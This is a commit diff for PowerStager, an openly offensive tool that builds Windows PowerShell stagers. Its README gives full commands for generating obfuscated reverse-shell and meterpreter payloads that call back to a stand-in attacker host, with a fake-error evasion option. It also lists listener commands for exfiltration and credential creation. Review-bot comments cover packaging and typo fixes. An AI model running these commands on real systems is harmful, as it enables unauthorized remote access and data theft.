Commit of PowerStager version 0.2.5
README.md (126 changed lines)
@@ -17,27 +17,143 @@ Additional methods allows the payload to be embedded into the 'stager' and tempo

Not only are powershell powerful when managing Windows, it's also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more...

Demo
----
[](https://vid.me/Tfzr "powerstager demo - Click to Watch!")

How to use
----------

Prerequisites:

python3
python3-setuptools
i686-w64-mingw32-gcc
x86_64-w64-mingw32-gcc
i686-w64-mingw32-windres
x86_64-w64-mingw32-windres

Prerequisites (python3 modules):

os
sys
getopt
glob
socket
fcntl
errno
string
re
random
base64
datetime
time
hashlib
readline
signal
urllib
names

Install it:

git clone https://github.com/z0noxz/powerstager
cd powerstager
sudo ./setup.py install

Generate a reverse shell payload to upload:

powerstager --target win64 \
--reverse-shell \
--lhost 13.37.13.37 \
--lport 4444 \
--generate \
--output out.ps1

powerstager --target win64 \
--url <url pointing the the uploaded payload> \
--output out.exe

Generate an embedded reverse shell payload, with obfuscation and fake-error:

powerstager --target win64 \
--reverse-shell \
--lhost 13.37.13.37 \
--lport 4444 \
--obfuscation \
--fake-error \
--output out.exe

Generate a meterpreter payload to upload:

powerstager -t win64 -o out.ps1 -m --lhost 13.37.13.37 --lport 4444 --generate
powerstager -t win64 -o out.exe -u <url pointing the the uploaded payload>
powerstager --target win64 \
--meterpreter \
--lhost 13.37.13.37 \
--lport 4444 \
--generate \
--output out.ps1

powerstager --target win64 \
--url <url pointing the the uploaded payload> \
--output out.exe

Generate an embedded meterpreter payload:
Generate an embedded meterpreter payload, with obfuscation and fake-error:

powerstager -t win64 -o out.exe -m --lhost 13.37.13.37 --lport 4444
powerstager --target win64 \
--meterpreter \
--lhost 13.37.13.37 \
--lport 4444 \
--obfuscation \
--fake-error \
--output out.exe

Generate an embedded custom payload:

powerstager -t win64 -o out.exe -p input.ps1
powerstager --target win64 \
--path input.ps1
--output out.exe

Open a reverse shell listener:

powerstager --listener \
--lport 4444

Reverse shell listener commands:
* Local-Invoke
*Invokes powershell script files from host*

* Local-Import-Module
*Imports powershell modules from host*

* Local-Set-Width
*Changes the buffer width on remote client*

* Local-Upload
*Uploads files from host*

* Local-Download
*Downloads files from client*

* Local-Download-Commands
*Downloads available powershell commands from client*

* Local-Enumerate-System
*Runs enumeration scripts on client*

* Local-Check-Status
*Collects user and privilage status from client*

* Local-Spawn-Meterpreter
*Spawns meterpreter shells on client*

* Local-Spawn-Reverse-Shell
*Spawns reverse shells on client*

* Local-Credential-Create
*Creates credentials on client*

* Local-Credential-List
*Lists created credentials on client*


## DISCLAIMER:
You shall not misuse this tool to gain unauthorized access. This tool should only be used to expand knowledge, and not for causing malicious or damaging attacks. Performing any attacks without written permission from the owner of the system is illegal.
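Review bot: the custom-payload example is missing the line continuation after `--path input.ps1`, so `--output out.exe` would run as a separate command; add the trailing backslash that every other multi-line example in this hunk uses. Smaller fixes in the same hunk: `<url pointing the the uploaded payload>` (three occurrences) doubles "the", `privilage` in the Local-Check-Status description should be `privilege`, and the intro sentence should read "Not only is powershell powerful". The "Prerequisites (python3 modules)" list is almost entirely standard-library modules that ship with python3 (os, sys, getopt, glob, socket, fcntl, errno, string, re, random, base64, datetime, time, hashlib, readline, signal, urllib); only `names` is a separate package, and `fcntl` and `readline` are not available on Windows, so the README should say which module actually needs installing and that the generator itself is meant to run on a Unix-like host, as the mingw cross-compiler prerequisites already imply.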
File diff suppressed because it is too large
setup.py (17 changed lines)
@@ -3,13 +3,13 @@ from setuptools import setup

setup(
name="PowerStager",
version="0.2",
version="0.2.5",
description="This script creates an executable stager that downloads a selected powershell payload.",
author="z0noxz",
author_email="z0noxz@mail.com",
url="https://github.com/z0noxz/powerstager",
classifiers=[
"Development Status :: 2 - Beta",
"Development Status :: 0.2.5 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: End Users/Desktop",
"Natural Language :: English",
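Review bot: `"Development Status :: 0.2.5 - Beta"` is not a valid trove classifier; classifiers are fixed strings from the PyPI list, and the Beta entry is `"Development Status :: 4 - Beta"` (the removed `2 - Beta` was also wrong, since 2 is Pre-Alpha). Keep the release number only in `version="0.2.5"`, which this hunk already sets; an unrecognised classifier is rejected on upload to PyPI.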
@@ -20,10 +20,21 @@ setup(
"os",
"sys",
"getopt",
"glob",
"socket",
"fcntl",
"errno",
"string",
"re",
"random",
"base64",
"hashlib"
"datetime",
"time",
"hashlib",
"readline",
"signal",
"urllib",
"names",
],
scripts=["bin/powerstager"],
packages=["powerstager"]
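Review bot: this list mixes the standard-library modules os, sys, getopt, glob, socket, fcntl, errno, string, re, random, base64, datetime, time, hashlib, readline, signal and urllib with the third-party `names` package. The key the list belongs to sits above the hunk, but if it is `install_requires`, pip will try to resolve each name as a distribution and fail on the standard-library ones; keep only `names` there and drop the rest, and list `fcntl`/`readline` as a Unix-only platform requirement in the README instead.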